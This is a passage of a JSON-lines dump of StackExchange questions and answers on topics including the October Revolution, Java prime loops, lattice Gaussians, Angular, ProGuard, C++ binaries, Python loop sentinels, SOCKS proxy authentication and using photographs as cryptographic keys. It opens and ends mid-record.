\"seclusion\" he issued orders from afar but was also lagging in responding to events while being alone and designing the world to his liking - a typical position for Lenin throughout his life. However, his enormous force of will drove the party forward, as Lenin was almost alone in the Central Committee for his extreme stance and goal - yet it was achieved. During October 24-25, Lenin spent the time in disguise and making furtive movements. Shortly after, he was almost forced to take the chair of the new proto-government Sovnarkom.\nIn conclusion, Trotsky was responsible for \"public agitation\" and for running the \"legitimate face\" of the coup: pitting the Congress of Soviets against the government. Lenin lashed the party - often from a distance - for extreme goals and put out strategy that was often hit-and-miss with real events.\nCoups are by definition events that can be placed at the feet of certain names and faces, and in this case Trotsky and Lenin were responsible.\nThis answer is a digest that is sourced from:\nPipes, Richard. The Russian Revolution. Vintage Books, 1990.\nPipes, Richard. Russia under the Old Regime. Penguin Books, 1995.\nAnswer: I can't offer a succinct answer, but Mike Duncan develops the answer in depth in the Revolutions Podcast; Lenin's intellectual and strategic leadership was undeniable. Without Lenin there would have been no revolution.\nLenin strategically manipulated all forces to the cusp of a revolution. Everyone else was seeking some form of harmonious outcome along the lines of a pareto optimal parliament. Lenin advocated for revolution in public and in private manipulated to ensure that revolution would occur.\nComment: Not directly related - I think that with the advantage of the hindsight we can say that the revolution was an error. Even from the Marxist point of view - Russia could have benefitted from developing democratic\/liberal\/capitalist society along western lines. The lack of mature proletariat resulted in the party dictatorship with the well-known consequences. One could even say that, thanks to the October revolution, Russia returned to the autocratic rule, which had been supposed to end in February.\n","meta":{"source":"history.stackexchange","title":"What were Lenin's and Trotsky's roles in the October revolution of 1917?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Trying to find out prime numbers using for loop but my code is not working, why?\n\nQuestion: <code>import java.util.Scanner;\n\npublic class forLoopPrimeNumberSearch {\n\n public static void main(String[] args) {\n Scanner input = new Scanner(System.in);\n System.out.print(\"Enter begining value: \");\n int beginingValue = input.nextInt();\n System.out.print(\"Enter ending value: \");\n int endingValue = input.nextInt();\n\n System.out.println(\"Prime number between \" + beginingValue+ \" to \"+ endingValue);\n int counter = 0;\n for(int i = beginingValue; i<= endingValue; i++){\n if(i <=1){\n continue;\n }\n boolean ifPrime = true;\n for( int k = 2; k <= i ; k++){\n \/\/if i write the above line like this than i get the expected result for( int k = \n if(i % k == 0){\n ifPrime = false;\n break;\n }\n }\n if(ifPrime){\n System.out.print(i + \" \");\n counter++;\n }\n }\n System.out.println(\" \");\n System.out.println(\"Number count: \" +counter);\n\n }\n<\/code>\nMaybe there are many different ways to solve this problem but as a beginner, I try to implement what I have learned so far.\nAnswer: Here:\n<code>for( int k = 2; k <= i ; k++) \n<\/code>\nBecause of this condition: <code>k <= i<\/code> You're checking <code>k<\/code> as a factor of <code>i<\/code> when <code>k<\/code> is equal to <code>i<\/code>. So you'll always find a factor, even if <code>i<\/code> is prime.\nChange the condition to <code>k < i<\/code>. Or if you want your code to be a little more efficient, stop when <code>k<\/code> is greater than the square root of <code>i<\/code>.\nAnswer: The problem here is, your loop condition is <code>k <= i<\/code>. This will make it so that when you get to the last iteration of the loop, you check \"is i divisible by i?\", which of course will yield a result of a composite number. What you want to do is check all of the numbers less than i, or to be more precise less than the square root of k, to really check the primality of the number. Your loop will then become like so.\n<code>boolean ifPrime = true;\nfor(int k = 2; k <= Math.sqrt(i); k++) {\n if(i % k == 0) {\n ifPrime = false;\n break;\n }\n}\n<\/code>\nAlso, for this type of algorithm where you have to find all of the prime numbers in a certain range, something like the Sieve of Eratosthenes algorithm will work much better and will be faster.\n","meta":{"source":"stackoverflow","title":"Trying to find out prime numbers using for loop but my code is not working, why?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Gaussian function in lattices\n\nQuestion: Probability density function of gaussian distribution is \n$$ 1\/{\\sqrt{2 \\pi} \\sigma} \\times {e^{{(x-c)^2\/ 2{\\sigma}^2 }}} $$\nin lattices we assume $$ \\sigma =s\/\\sqrt{2 \\pi} $$so the gaussian function becomes\nFor $$X \\in R^n$$ $$\\rho_s(X)=1\/s^n \\times e^{-{\\pi}||(x-c||)^2\/s^2}$$ but it is given as\n$$\\rho_s(X)= e^{-{\\pi}||(x-c||)^2\/s^2}$$ can you explain why is this difference?\nComment: This isn't my area, but if I had to guess it's because the $\\frac{1}{s^n}$ is a scaling factor that doesn't affect sampling from the distribution?\nComment: Is it really 1 over $s^n$ or it should be $s^2$ ?\nAnswer: The Gaussian function over a lattice, if you define it with or without the scaling factor $1\/s^n$, is not a probability distribution, since it does not sum to 1. In order to construct a probability distribution, that samples points proportionally to the Gaussian function, one has to rescale anyway by dividing by the sum of the Gaussian over all lattice points (even though this is an infinite sum, it is well defined and one can compute sharp bounds on it). So any scaling factor you apply to the Gaussian function will be cancelled out by this normalization anyway, so you might as well define the Gaussian without it.\nAnswer: $\\rho_s(X)$ for a lattice with dimension $n$ is $(1\/s)^ne^{-\\pi||X||^2\/s^2}$\nAs we know it is Spherically Symmetric. So The probability of $X$ only depends on its length. We can consider $s=1$ in this case.\n","meta":{"source":"crypto.stackexchange","title":"Gaussian function in lattices","dup_signals":{}},"subset":"stackexchange"} +{"text":"Calculate difference in 2 values - Angular\n\nQuestion: I have a table that has 3 values (old, new & difference) I'm wondering how to calculate the difference in the 2 values to set the 'differenceInValues' variable. Thanks in advance!\n<code><td scope=\"row\">\n {{change.oldValue}}\n<\/td>\n<td scope=\"row\">\n {{change.newValue}}\n<\/td>\n<td scope=\"row\">\n {{change.differenceInValues}}\n<\/td>\n<\/code>\nComment: Can you give more information - what is in `oldValue` and `newValue`? The difference can be calculated for numbers quite simply (by subtracting them)\nAnswer: May be this example will help you:\nHTML\n<code><div>\n {{value1}}\n<\/div>\n<div>\n {{value2}}\n<\/div>\n<div>\n {{getDiff()}}\n<\/div>\n<\/code>\nTS\n<code>@Component({\n selector: 'app-root',\n templateUrl: '.\/app.component.html',\n styleUrls: ['.\/app.component.scss']\n})\nexport class AppComponent {\n\n value1: number = 5;\n value2: number = 3;\n\n getDiff(): number {\n return this.value1 - this.value2;\n }\n}\n<\/code>\nComment: @jo-chris ok, you can use {{value1 - value2}} :)\nComment: I would not recommend using methods in templates, even if its as simple as here. Store the result in a variable and then use String Interpolation to display it.\n","meta":{"source":"stackoverflow","title":"Calculate difference in 2 values - Angular","dup_signals":{}},"subset":"stackexchange"} +{"text":"Offline functionality in asp.net mvc with local storage\n\nQuestion: I want to add offline functionality in my existing asp.net mvc 4.7 web application. I searched a lot and found many links to add offline functionality in html pages but could not find any link for asp.net mvc. please provide me link of any sample work done related to this.\nAnswer: The modern web ecosystem is made up of many different types of scenarios of how users interact with online content.We imagined leveraging the browser to bring fully competent web applications to the desktop, but failed due to the lack of decent browser support. Although there were some caching techniques available before, they were never really designed with the intention of making web applications run completely offlin.\nSo if you want to make a offline suported web appilcain you should know --\n\nHow to manage, refesh, save manifest files both Server & client side\nHow to manage caching both Server & client side\nHow to swapping cache\nHow to Handling events\nHow to Detect whether the browser is online or offline and let user know.\n\nyou can find more information in below articles --\n\nBuild an HTML5 Offline Application with Application Cache, Web Storage and ASP.NET MVC\nHTML5 offline web applications using ASP.NET MVC\nComment: It might be helpful for my current project\n","meta":{"source":"stackoverflow","title":"Offline functionality in asp.net mvc with local storage","dup_signals":{}},"subset":"stackexchange"} +{"text":"Note: android.support.v4.text.ICUCompatIcs: can't find dynamically referenced class libcore.icu.ICU\n\nQuestion: I started getting the message with the latest Android Build Tools (ABT) v19.0.3 today. At first glance, I thought this might be an issue with ABT. However, a closer investigation reveals that this message:\n<code>android.support.v4.text.ICUCompatIcs: can't find dynamically referenced class libcore.icu.ICU\n<\/code>\nis only shown when Proguard is used. Answers on the net has yeilded no solution for me. Perhaps, this is only an issue with Proguard (the version I'm using is bundled with Android SDK v22.3).\nI have added the following directives to <code>proguard-project.txt<\/code> file, but it makes no difference:\n<code>-keep interface android.support.v4.** { *; }\n-keep class android.support.v4.** { *; }\n<\/code>\nDoes anyone else come across this message and has a possible solution? Maybe Eric from Proguard might be able to shed some light into this issue. Maybe a code cleanup is required with Proguard? I'm interested to know the solution.\nComment: I faced the same issue today when set up proguard for my project. As this is just a Note I ignored it and my proguarded code runs well.\nComment: Have you tried using something like `-libraryjars $ANDROID_HOME\/extras\/android\/support\/v7\/appcompat\/libs\/android-support-v4.jar` ?\nComment: @deko: Yes, I can use the `dontwarn` directive to ignore the comment. However, should Proguard even display this comment? @Shonzilla: Adding `keep class android.support.v7.appcompat** { *; }` or doing what you suggested above also do not remove the comment. That's why I'm stumped.\nAnswer: The note says that a support class is using reflection to access a runtime class that isn't present in the target runtime. In general, it could be a sign of compatibility problems. In this case, it's harmless; the developers of the support library are precisely using reflection to avoid any linking problems with different runtime environments. You can suppress the note with:\n<code>-dontnote android.support.**\n<\/code>\nComment: Thanks, Eric. I'll add your suggestion above to my project.\n","meta":{"source":"stackoverflow","title":"Note: android.support.v4.text.ICUCompatIcs: can't find dynamically referenced class libcore.icu.ICU","dup_signals":{}},"subset":"stackexchange"} +{"text":"Do compiled C++ binaries store the original source code?\n\nQuestion: When I run some C++ code, and I receive an error, it manages to print out the exact line in a particular source file on which that error occurred. This is obviously great for debugging, but I believe that the program I am running was built in release mode. So my questions is, do all programs built in release mode store the original source c++ code, with references to it in the compiled binary? This seems like an inefficient way to create a binary if it is only to be distributed to consumers, rather than to developers.\nComment: The simple answer is: No. However, when you build debug versions the compiler usually stores some information about the source, including line-number information and where the actual source files can be found. *How* the compiler stores that differs between compilers and platforms.\nComment: If you are talking about asserts, or similar methods, they don't store all your source-code, they only store the expression they're asserting (not that you should necessarily enable assertions in release).\nComment: This is highly tool dependent. Describe your tool chain.\nComment: @PeterT It really depends on the implementation: a lot do, but it isn't required. (And in most cases, you _should_ leave assertions active in your released code.)\nAnswer: I never saw a \"mainstream\" C++ compiler store the original source. When you see some references to the source, typically it boils down to one of those tricks:\n\nreferences to source file\/line: these are created via macros. Most logging libraries provide some macro that includes in its bowels the <code>__FILE__<\/code> and <code>__LINE__<\/code> macros, which, at compile time, expands to the current file and line; macros like <code>__FUNCTION__<\/code> are a common extension;\n\nexpressions in failed asserts: the <code>assert<\/code> macro (and similar beasts) often not only uses <code>__FILE__<\/code> and <code>__LINE__<\/code>, but stringifies (again, at compile time) the given expression, to show it when the <code>assert<\/code> fails;\n\nnames of classes in the executable: if you enable RTTI, the compiler has to store somewhere the names of the types, to allow the use of the <code>typeid<\/code> operator;\n\nstuff you see in the debugger\/in stack traces: this comes from the debugging information, which allows a reverse mapping from the instruction pointer to the location in the sources and the function name; this of course requires having the debug information (which may or may not be generated in release builds, or may be put in a separate file) and the actual sources (if you want to look up what the code actually is).\nSince this is both quite big (in a project I work on it is 12x the size of the stripped executable) and can help in reverse engineering, it is rarely shipped to the customer (but is kept in-house, to be able to analyze the \"raw\" stack traces generated by the released application).\nAnswer: No. Neither in debug nor in release mode are the actual sources stored.\nThe tool chain may store enough information for debugger to map\naddresses in the machine code to lines in the sources, but the sources\nmust be available if the debugger is to display anything. This has\nnothing to do with \"Debug\" or \"Release\" mode; at least in our\nconfiguration, we store it in both. (Of course, because the compiler\nmay rearrange bits of code when it optimizes, the information isn't\nalways exploitable in optimized builds.)\nAs for the output of <code>assert<\/code>: C++ has two built in macros, <code>__FILE__<\/code>\nand <code>__LINE__<\/code>, which the compiler will replace with the appropriate\nvalues when it is compiling the code. These are used in the <code>assert<\/code>\nmacro (typically, at least), and usually in various user defined logging\nmacros as well. The macro preprocessor also has an operator to\n\"stringize\" its arguments, which can be used to get the asserted\nexpression into the assert output.\nAnswer: Compilers don't store the original source code. As mentioned, with a debug build, they store line numbers which are used to reference source code. There were some old tool sets (assemblers, compilers) that would leave fragments of source code in what should have been uninitialized memory in a program, just grabbing whatever happened to be in memory during assembly or compile time when creating the uninitialized memory area of a program. This mostly occurred with .COM program files since there's no provision for load time allocation of uninitialized memory as there is with a .EXE program.\n","meta":{"source":"stackoverflow","title":"Do compiled C++ binaries store the original source code?","dup_signals":{}},"subset":"stackexchange"} +{"text":".NET Framework 4.7 support?\n\nQuestion: I would like to leverage some new features in .NET 4.7 (like built-in support for Value Tuples).\nHowever, after changing the target framework to 4.7 in my model project, when I update my model I see the following in the output window:\n<code>The DevForce EDM Extension cannot be used with model BearPawModelMain.edmx. If you wish to use DevForce change the target framework for this project to 4.5+\n<\/code>\nIs 4.7 supported? The message is misleading...\nComment: check that all your project as targeting 4.7 also i believe this only available with win 10 latest... or something like that.\nAnswer: DevForce doesn't currently support .NET 4.7 in model projects (containing either an EDMX or Code First model). We'll be adding this support later this summer. \nComment: Ok thanks. I discovered I can add value tuple support via nugget so I will do that for now.\nComment: I see that there is a 7.5.2-rc build available. Do you have any estimate on when that will be officially released? We are at the early stages of moving to 4.7 so are curious about this.\nComment: We'll probably release 7.5.2 the first week in July.\n","meta":{"source":"stackoverflow","title":".NET Framework 4.7 support?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How do I check if my loop never ran at all?\n\nQuestion: How do I check if my loop never ran at all?\nThis somehow looks too complicated to me:\n<code>x = _empty = object()\nfor x in data:\n ... # process x\nif x is _empty:\n raise ValueError(\"Empty data iterable: {!r:100}\".format(data))\n<\/code>\nAin't there a easier solution?\nThe above solution is from curiousefficiency.org\nUpdate\n\ndata can contain <code>None<\/code> items.\ndata is an iterator, and I don't want to use it twice.\nComment: If `data` is a list, why not use `if not data:`?\nComment: Is `data` a list or other such container?\nComment: Why do you think this is too complicated? It's straightforward and readable.\nComment: @H\u00e5kenLid Many reasons make the quoted code complicated: (1)\u00a0You have to read and keep in mind the first line without understanding its purpose yet. (2) The loop normally changes `x`, which is unusual since we just set `x`: what is going on? (3) The test at the end does not work if the last element of `data` is `object()`: is this intended? can this happen? are we really testing for the emptiness of `data`? (4) The test intended to say \"is data empty \" actually reads \"is x empty\". Another reason why it is complicated is that there is a simpler solution (see my answer). :)\nComment: As pointed out by @H\u00e5kenLid, (3) is actually not a problem, because `object()` creates a new object (it's not a singleton).\nAnswer: By \"never ran\", do you mean that <code>data<\/code> had no elements?\nIf so, the simplest solution is to check it before running the loop:\n<code>if not data:\n raise Exception('Empty iterable')\n\nfor x in data:\n ...\n<\/code>\nHowever, as mentioned in the comments below, it will not work with some iterables, like files, generators, etc., so should be applied carefully.\nComment: That will work with some iterables, but not all (e.g. a file or a generator function\/expression).\nComment: If `data` is a sequence, this'll work - if it's an `iterable` it'll always be true even if it'll never yield any elements\nComment: I think checking for a sentinel value is okay; not sure what problem the OP has with it.\nComment: Since the updated question mentions that it is using an *iterator*, this solution does not work.\nAnswer: The original code is best. \n<code>x = _empty = object()\n<\/code>\n<code>_empty<\/code> is called a sentinel value. In Python it's common to create a sentinel with <code>object()<\/code>, since it makes it obvious that the only purpose of <code>_empty<\/code> is to be a dummy value. But you could have used any mutable, for instance an empty list <code>[]<\/code>.\nMutable objects are always guaranteed to be unique when you compare them with <code>is<\/code>, so you can safely use them as sentinel values, unlike immutables such as <code>None<\/code> or <code>0<\/code>.\n<code>>>> None is None\nTrue\n>>> object() is object()\nFalse\n>>> [] is []\nFalse\n<\/code>\nComment: I really don't agree that the original code is best: my comment to the question explains why (essentially: the code *is* complicated, and there is a much cleaner and clearer solution).\nAnswer: The following simple solution works with any iterable. It is based on the idea that we can check if there is a (first) element, and then keep iterating if there was one. The result is much clearer:\n<code>import itertools\n\ntry:\n first_elmt = next(data)\nexcept StopIteration:\n raise ValueError(\"Empty data iterator: {!r:100}\".format(data))\n\nfor x in itertools.chain([first_elmt], data):\n \u2026\n<\/code>\nPS: Note that it assumes that <code>data<\/code> is an iterator (as in the question). If it is merely an iterable, the code should be run on <code>data_iter = iter(data)<\/code> instead of on <code>data<\/code> (otherwise, say if <code>data<\/code> is a list, the loop would duplicate the first element).\nComment: `object()` creates an unique object every time, so that wouldn't be a problem.\nComment: You're right, my bad. I removed the related comment.\nAnswer: I propose the following:\n<code>loop_has_run = False\nfor x in data:\n loop_has_run = True\n ... # process x\nif not loop_has_run:\n raise ValueError(\"Empty data iterable: {!r:100}\".format(data))\n<\/code>\nI contend that this is better than the example in the question, because:\n\nThe intent is clearer (since the variable name specifies its meaning directly).\nNo objects are created or destroyed (which can have a negative performance impact).\nIt doesn't require paying attention to the subtle point that <code>object()<\/code> always returns a unique value.\n\nNote that the <code>loop_has_run = True<\/code> assignment should be put at the start of the loop, in case (for example) the loop body contains <code>break<\/code>.\nComment: This is not bad, but this has the unfortunate side effect of forcing a useless assignment at each iteration but the first one (which makes your second point about the penalty of creating an object moot). There is no need for such a penalty (see my answer, which is what I would use in real life :).\nComment: @EOL: In general the penalty of an assignment is *much* cheaper than the penalty of creating\/destroying an object. Obviously the effect of this on actual runtime will vary, especially depending on the typical number of iterations of the loop (always measure!). I believe your solution implicitly performs allocation due to the call to `itertools.chain`, but I haven't confirmed this.\nComment: Agreed, the existence of a performance penalty compared to the solution quoted in the question depends on the size of the data. Now, this does not change the fact that doing the assignment over and over in the loop is wasteful and algorithmically dubious\u2014again, I don't think it's too bad, though. :) I'm not sure what \"allocation\" that would be in my solution you can be referring to: maybe the creation of a list?\nAnswer: You can add a <code>loop_flag<\/code> default as False, when loop executed, change it into True:\n<code>loop_flag = False\nx = _empty = object()\n\nfor x in data:\n loop_flag = True\n ... # process x\n\nif loop_flag:\n print \"loop executed...\"\n<\/code>\nComment: Not all that helpful either.\nComment: Why have both a test on `x` and a `loop_flag`? This is unnecessarily redundant.\nComment: loop_flag=True should be the first statement. Otherwise a `continue` in \"process x\" would create unintended results.\nAnswer: The intent of that code isn't immediately obvious. Sure people would understand it after a while, but the code could be made clearer.\nThe solution I offer requires more lines of code, but that code is in a class that can be stored elsewhere. In addition this solution will work for iterables and iterators as well as sized containers.\nYour code would be changed to:\n<code>it = HadItemsIterable(data)\nfor x in it:\n ...\nif it.had_items:\n ...\n<\/code>\nThe code for the class is as follows:\n<code>from collections.abc import Iterable\nclass HadItemsIterable(Iterable):\n\n def __init__(self, iterable):\n self._iterator = iter(iterable)\n\n @property\n def had_items(self):\n try:\n return self._had_items\n except AttributeError as e:\n raise ValueError(\"Not iterated over items yet\")\n\n def __iter__(self):\n try:\n first = next(self._iterator)\n except StopIteration:\n if hasattr(self, \"_had_items\"):\n raise\n self._had_items = False\n raise\n self._had_items = True\n yield first\n yield from self._iterator\n<\/code>\nAnswer: What about this solution?\n<code>data=[]\n\ncount=None\nfor count, item in enumerate(data):\n print (item)\n\nif count is None:\n raise ValueError('data is empty')\n<\/code>\n","meta":{"source":"stackoverflow","title":"How do I check if my loop never ran at all?","dup_signals":{}},"subset":"stackexchange"} +{"text":"What's the point in a proxy server authorizing\/authenticating clients?\n\nQuestion: I've implemented a SOCKS5 proxy library, but I just don't get the point of authenticating (or encrypting) connections, which the RFC (1928) seemed pretty adamant about. Isn't anonymity the whole idea of a proxy?\nI also understand that encrypting traffic between the client and server is possible, but that only covers the client-server half of client-server-destination path: isn't that kind of pointless? Shouldn't the encryption (if it's absolutely necessary) run end-to-end instead?\nAnswer: This is really two questions, but eh...\nWhat's the point of proxy authentication?\nContrary to what you seem to believe, there are many reasons beyond anonymity to use a proxy (and if you want good anonymity, you should use something like Tor rather than a single proxy). A few of those reasons:\n\nBypassing geographical or IP-based restrictions.\nUsing the proxy as a bridge between the network you're on and one you want to access (for example, getting from an internal corporate or cloud network out to the Internet, or the reverse).\nUsing a proxy for monitoring, logging, or filtering network traffic (for your own security, or for the security\/control of a company or other entity that wants to limit what you can access on\/from its network).\nUsing a proxy for intercepting or modifying network traffic (for security testing, or for tampering with network traffic).\n\nFor many of these purposes, there are good reasons to use authentication. For example, a geo-filtering bypass proxy may be offered as a commercial service, and they want to ensure that only paying users can access the proxies they provide. A corporate proxy wants to ensure that only authorized employees are able to access its network, and possibly also to know which employee is using a particular machine for monitoring and logging purposes. Somebody using a network testing proxy that is opened to other devices on the network may want to make sure that only their own authorized devices can connect to the proxy, rather than allowing arbitrary network users to connect and send requests either directly to the proxy or from their computer.\nAdditionally, having an open proxy is just risky. For example, suppose somebody used an open proxy that you run to send death threats or upload child porn or something else illegal like that, and it gets traced back to your IP address. That's not a good situation to be in (though I'm not a lawyer and am not sure exactly how much legal jeopardy you might be in there), especially if you don't have any way to demonstrate it was somebody else (such as a proxy's authentication logs).\n\nShouldn't encryption, if used, be end-to-end?\nIn general, yes, but that's not always practical and there might be reasons to want to separately encrypt the client-proxy traffic anyway. There's no reason that you can't run end-to-end encrypted traffic, such as HTTPS, through a proxy where your encryption to the proxy is itself encrypted. In fact, if you were using the proxy to conceal your network activity from your ISP or similar, you would absolutely want to do this (otherwise the ISP would be able to see your DNS lookups, the domain names of the sites you wanted to connect to, the amount of network traffic you exchange in each direction with each site and at what times, and so on). Encrypting the connection to the proxy is also obviously helpful any time you want secure authentication, although there are ways to do reasonably-secure authentication over insecure connections (such as SRP).\nAlso, encrypting the connection only between you (the client) and the proxy is still better than no encryption at all, which would be the case when connecting to a server that doesn't support encryption (such as one that only supports HTTP or FTP, for example). A local network attacker still can't see (or modify) what you're doing (as they could if the proxy connection was unencrypted), even though the proxy server and anybody downstream of it can.\n","meta":{"source":"security.stackexchange","title":"What's the point in a proxy server authorizing\/authenticating clients?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Can an arbitrary physical image be a key?\n\nQuestion: Assume an arbitrary secret physical image\u00b9, such as a privately made chemical Polaroid\u2122 similar to this\n\nIs there a feasible and secure way that this physical image could be used as cryptographic key, functionally equivalent to an AES key or RSA private key, without \"accompanying\u00b2 other digital data\" beyond the physical image? We'll assume a scanner digitizes the physical image at each use, and all the rest is handled digitally.\nWe may want to distinguish 4 use cases\n\nSymmetric message encryption and decryption\nSymmetric message authentication and verification\nAsymmetric decryption of a ciphertext for a secret message, encrypted using a previously made public key\nAsymmetric\/Digital signature of a message, publicly verifiable using a public key assumed authentic.\n\nFor asymmetric, there is the issue that contrary to traditional private keys, the physical image can't contain the public key, which needs to be prepared separately (from an independent scan).\nAssume we want at least\u00b3 CPA security and EUF-CMA signature security; and we are ready to tolerate that cryptograms and public keys are large, the algorithms slow, and that legitimate decryption or signature verification fails with some low yet noticeable probability.\nIf that's not possible (I don't know a method\u2074), can the necessary \"accompanying\u00b2 other digital data\" be public? Does it's integrity need to be trusted? How large does it needs to be for various kinds of physical image, perhaps including biometric data (assumed private)? What standard name(s) does this \"other data\" have?\nLate update (2021-09-08): I now wonder if for symmetric crypto we could use the combination of\n\nimage preprocessing as in this answer;\nRan Canetti, Benjamin Fuller, Omer Paneth, Leonid Reyzin, Adam Smith: Reusable Fuzzy Extractors for Low-Entropy Distributions, originally in proceedings of EuroCrypt 2016;\nAES-GCM with the \"helper\" in the above passed as associated data, and key the \"extract\".\n\n\u00b9 The question was initially asked for biometric data assumed private and acquired in a socially acceptable way. Say, a retina scan, and there's an unfalsifiable method to recognize safe retina scanners from those that will keep a copy of the scan or burn the user blind, and eye doctors did not keep archives, and key rotation was unnecessary. The main reason I mentioned biometry was to repel it for use as straight replacement of a cryptographic key, with hard security argument rather than just poorly meeting the functional goals.\n\u00b2 By \"accompanying\" I mean kept along the image, with the same secrecy and integrity. The question is thus excluding e.g. making marks on the physical image. But embedding in the ciphertext some data generated from a scan of the physical image would be game.\n\u00b3 We'd additionally like that encryption remains secure under the assumption that an adversary can submit arbitrary ciphertexts to a decryption oracle, and gain knowledge of if the decryption was successful or not. This is tantamount to CCA security.\n\u2074 Main problem is that the outcome of a scan varies, and no algorithm can fix (in both senses of the term) it (at least, for all arbitrary images) into something directly usable as key in a standard cryptosystem, without some \"other data\". I suspect (robust?)fuzzy extractors may help to a degree, but I admit that my knowledge about them is itself fuzzy. It thus seems impossible to define a function that turn scans into a key for a standard unmodified symmetric cryptosystem like AES-CTR or AES-GCM, and have it secure and working acceptably reliably. To illustrate the difficulty I scanned a photo (not the one above), 5 times, using the same scanner with same setting (B&W 8-bit), just moving the image at each scan and manually moving a selection rectangle of constant size. Here are the scans. I believe that any deterministic algorithm that turns these scans into a stable key will either need to contain data extracted from one of the scans in order to get stable output for the others (and won't work reliably for most other set of scans made from different images), or will have insufficient entropy in it's output.\nComment: Previous comment were interesting, but outdated, or growing lengthy. They have been [moved to chat](https:\/\/chat.stackexchange.com\/rooms\/128733\/discussion-on-question-by-fgrieu-can-a-physical-image-be-a-key), which is appropriate for discussion.\nComment: How much tolerance is needed? When I understand you right, we may not assume that it is possible to take the the exact same picture again\nComment: @jjj: I don't know how to simply express \"how much tolerance is needed\". Broadly speaking, I want something secure and with acceptable reliability. Perhaps the later means failure rate of <1% on first try, down to 0.1% with a reiteration of the second scan. For the scan stability, see [this](https:\/\/chat.stackexchange.com\/transcript\/message\/59062904#59062904) [updated, link further updated].\nAnswer: Please let me confirm the major problem to be noisy reading of private key information, so that most (all well-known) crypto schemes would fail. Error correction is the well-established area having proper math\/tools to handle such a problem.\nFor a \"noisy private key\" signature, one would avoid actual correction, concentrating on \"small distance\/metric\" decisions over private data while verification. One particular error correction scheme, Goppa codes, might be convenient to combine with Schnorr protocol to achieve such a signature, IACR 2008\/359.\nSequence similarity might be another metric sometimes called Short Tandem Repeat (STR), and there are some forensic STR-identification databases around. One could approach such a metric with a sequence characteristic polynomial model and insertion\/deletion counting (set membership). Having sequences replaced with polynomials, one would combine it with Schnorr achieving a proof of DNA similarity, IACR 2008\/357.\nPolynomial graph representation was a precursor for sequence characteristic polynomial (IACR 2008\/363 and MFCS 2012), achieving graph isomorphism, hamiltonicity and coloring proofs with \"large\" challenges (not binary like 0 or 1); no errors or similarity metrics yet.\nSecret polynomials would invite a Schnorr-like protocol with higher degree (more that linear, degree-1) polynomials in the challenge of verifier. Finally, all the results mentioned would require some computer algebra helper\/library implemented to handle that higher-degree polynomials.\nComment: Well, encryption with \"noisy keys\" looks more complex than signature\/identification to me. It would probably mean implementing full error correction over private data somehow; it was not my point (priority).\nComment: Thanks for the confirmation and references to your work in the domain. I'd appreciate if you could clarify if you consider the answer to my main\/first question (the possibility to avoid \"extra data\" entirely) is yes or no, perhaps distinguishing symmetric encryption, public-key encryption, and signature if needed. Also, if \"extra data\" is needed for \"Error correction\", it's less clear if it is only that or if there's some crypto on top; if it can be public; if it must be trusted to avoid attack; and if there's a standard name for it.\nAnswer: If you use at least 7 riffle shuffles to randomize a deck of 52 cards, and take a photo of the deck spread out just enough such that each letter\/suite is clearly visible, that will give you a (log2 (52!)) == 225 bit secret key for use in symmetric encryption. Then you could use key stretching to take you a little higher if necessary.\nYou could come up with similar schemes as long as you have enough control over the items being photographed to ensure there was no ambiguity. For example, you could drop a box of toothpicks on the floor, and then manually adjust each toothpick so it is roughly only at a 0, 45, or 90 degree angle prior to taking a photo. Key extraction would then use the angle of each toothpick to the nearest 45 degrees.\nComment: That's true. We can also encode a key into a QR-code. Neither really answers the question as I intended it. I have now added \"arbitrary\"\nComment: @fgrieu I agree it can't be used on an arbitrary image. However, it does solve the problem of allowing a photo to be taken without use of computer assistance, which would not be the case if you simply photographed a QR code.\nComment: Good point! It's an interesting way to manually generate and encode a key, and pass it as an image that is then machine-readable.\nAnswer: The challenging part is mostly about image processing, and not a lot about crypto.\nYou want to extract from the image sufficient entropy in a reliable fashion.\nIt has a lot to do with how you use the image and your adversary model.\nIf your adversary knows nothing at all about the image, some simple coarse features could be sufficient, if your adversary knows a lot about the image, e.g has gotten a glance at it, or knows aproximately where it was taken you need to be more careful on what information is extracted from the image and will need to use finer grained image features which will be hard to extract in a stable fashion.\nIf each time the image is used it is scanned in the same high quality scanner, and between usages it is kept safely so it doesn't fade, wrinkle or accumulate dust it would be easier to get scans very close to each other and have only simple auto alignment and discretization (spatial and color) to get almost the same bit sequence each time.\nThen the question is what the error model we have for the scan results? Do we expect gaussian noise? salt and peper? alignment noise? rotation? addition of large continious pieces of noise? lighting noise?\nEach type of noise can be dealt with differently.\nA general outline for a solution: We use image processing techniques to minimize the noise to move to a representation which eliminates most of them then you limit the space to only certain valid points and pick the nearest valid point to what we have to bring noise down to zero.\nWe will discretize aggessively enough and pick sparse enough valid points to allow us to get to zero noise reliably. At this point we should still have much more than the required key length but in a space still closely related to the original image and as such the bits will be be biased and correlated.\nApplying a cryptographic hash to that data should sort it out and allow us to have sufficient high quality key material derived reliably, and get the same key exactly any time you scan. This could be used as e.g an AES key.\nIf you want to create an RSA key you will need many more random bits. You can however extract as many bits as you can extract while still reliably getting same bits every time and use that to seed a cryptographic PRNG and use it to generate an RSA private key.\nEdit: I didn't try to implement a full solution, but I did open a notebook and play with the noise model suggested, gaussian noise and shifts I believe are corrected easily, so I checked what happens if I rotate the image (with fancy interpolations) by 2 degrees and rotate back by 1.8 degrees I got a maximal diff (on the image above) of 33%, this is supportaive of my claim that by identifying best counter rotation and shift, lowering resolution and quantizing aggressively ignoring edges we should be able to get 1-2 bits per channel per ~25 pixel regions. For the above image it comes out at least 36K bits, and after hashing I bet this will have 128 bits of actual entropy\nEdit2: I downloaded the provided images of grey scale scans, and played with them, I semi-automatically aligned at rotated the first two image.\n<code>img = io.imread(\"scans\/scan078.tif\")\nimg2 = io.imread(\"scans\/scan079.tif\")\nimgr = transform.rotate(img,angle = -0.78)\nimgr2 = transform.rotate(img2,angle = -0.805)\ntr1=transform.rescale(imgr[:-10,:-6],0.1)[20:-20,20:-20]\ntr2=transform.rescale(imgr2[10:,6:],0.1)[20:-20,20:-20]\n<\/code>\nThis reads rotates each aligns and crops, downsamples 10x and crops to get rid of edges which may have artifacts.\nThis gives a Maximal difference of less than 6% per pixel value. Which is pretty good. However this 6% diff can easily be around any cut-off we choose so even quantizing aggressively doesn't give 0 errors.\n<code>bin1 = tr1> 0.5\nbin2 = tr2> 0.5\n<\/code>\nThis gave a difference in 103 bits out of 27248 bits or 0.37% These errors appear to be reasonably spread out.\nThis aggressive resizing and quantizing looses a lot of information but we probably 